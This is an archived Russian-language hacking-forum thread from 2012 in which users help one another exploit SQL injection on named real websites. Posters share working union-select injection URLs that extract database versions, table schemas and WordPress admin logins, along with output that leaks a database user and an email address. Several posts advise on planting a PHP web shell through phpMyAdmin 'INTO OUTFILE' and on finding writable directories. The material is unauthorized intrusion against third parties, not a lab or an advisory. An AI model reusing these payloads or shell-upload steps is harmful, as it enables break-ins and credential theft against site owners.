ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.03.2012, 21:29
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363
Репутация:
11
|
|
man ну ты вообще
читай тут на ачате статьи по sql injection,админка находится либо от того какая cms либо простым брутом
|
|
|
09.03.2012, 21:53
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018
Репутация:
0
|
|
Сообщение от Faaax
man ну ты вообще
читай тут на ачате статьи по sql injection,админка находится либо от того какая cms либо простым брутом
Ок, еще бы про составление запроса проконсультировали бы
|
|
|
|
09.03.2012, 22:16
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от Faaax
помогите раскрутить,вроде всё правильно делаю
Код:
http://www.auto-most.ru/site/video/testdrive/ford/905.html?next=30', 30 union select version()--+f
Если очень постараться, то можно раскрутить
5.2.4-MariaDB:automost:automost_automos@localhost: portbld-freebsd8.2
так что дерзай
|
|
|
|
09.03.2012, 22:47
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756
Репутация:
0
|
|
Сообщение от er9j6@
Если очень постараться, то можно раскрутить
5.2.4-MariaDB:automost:automost_automos@localhost: portbld-freebsd8.2
так что дерзай
И в подтверждение своих слов ты наверное сейчас всех удивишь и покажешь вектор атаки именно НА ЭТОМ МЕСТЕ, да?
|
|
|
|
10.03.2012, 14:50
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
столкнулся с таким впервые, стандартная скуль в mssql вывод через сообщение об ошибке:
Код:
HTTP/1.1 500 Internal Server Error
Date: Sat, 10 Mar 2012 09:07:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9201
Conversione non riuscita durante la conversione del valore nvarchar 'u:baudo@apre.it' nel tipo di dati int.
но вот трабла, ни один из дамперов не видит ответа. даже самописные, которые никогда не подводили. в чем может быть проблема? |
|
|
|
10.03.2012, 15:38
|
|
Новичок
Регистрация: 13.06.2010
Сообщений: 0
Провел на форуме:
521
Репутация:
0
|
|
Можно ли залить шелл на InstantCMS v1.9 ?
|
|
|
|
10.03.2012, 15:50
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от durito
столкнулся с таким впервые, стандартная скуль в mssql вывод через сообщение об ошибке:
но вот трабла, ни один из дамперов не видит ответа. даже самописные, которые никогда не подводили. в чем может быть проблема?
Дамперы думают, что ошибка в запросе и не дампить. А самописные дампить должны. Посмотри, нет ли перенаправлений.
|
|
|
|
10.03.2012, 17:31
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Код:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1/**/UnIon/**/selECt/**/1,COLUMN_NAME,3/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=%27wp_users%27/**/LIMIT/**/2,1--
Так выводит, а так нет...
Код:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1/**/UnIon/**/selECt/**/1,UNHEX%28HEX%28user_login%29%29,3/**/FROM/**/wp_users%27/**/LIMIT/**/0,1--
Как вывести?
P.S: использовать функции ASCII() и CHAR? |
|
|
|
10.03.2012, 17:33
|
|
Участник форума
Регистрация: 30.07.2010
Сообщений: 118
Провел на форуме:
39063
Репутация:
0
|
|
выручайте!
есть рут доступ к phpmyadmin.
мне уже один товарищ помог с залитием шелла, спасибо ему за это, но вопрос такой:
когда я пишу код
Код:
SELECT '' INTO OUTFILE '/dir/name/shell.php'
где указываю установочный путь, который я узнал из инъекции. и потом мне выдает что я не имею права записи в эту папку. вообще никуда. хотя нужно заметить что доступ рут.
решил пойти в обход, дал команду SELECT @@datadir которая мне выдала свободную папку /var/lib/mysql/
туда все спокойно льется, только понять где находится заветный php файл мне не удается.
Прошу помочь вас разобраться с первым вопросом или со вторым. Мб я что-то не так делаю |
|
|
|
10.03.2012, 18:02
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
aydin-ka,
в другой базе твоя таблица.
Узнаем вот так:
Код:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1+union+select+1,(SELECT+table_schema+from+information_schema.tables+where+table_name='wp_users'),3--+
Теперь выводит логин:
Код:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1+union+select+1,(SELECT user_login from smokycarrotcom1.wp_users limit 0,1),3--+f
stan0009,
Из /var/lib/mysql/ не сможешь выполнять скрипты. Ищи папки, типа /uplaods/, /images/, /tmp/ и т.д. и т.п. Там обычно CHMOD 755 or 777.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
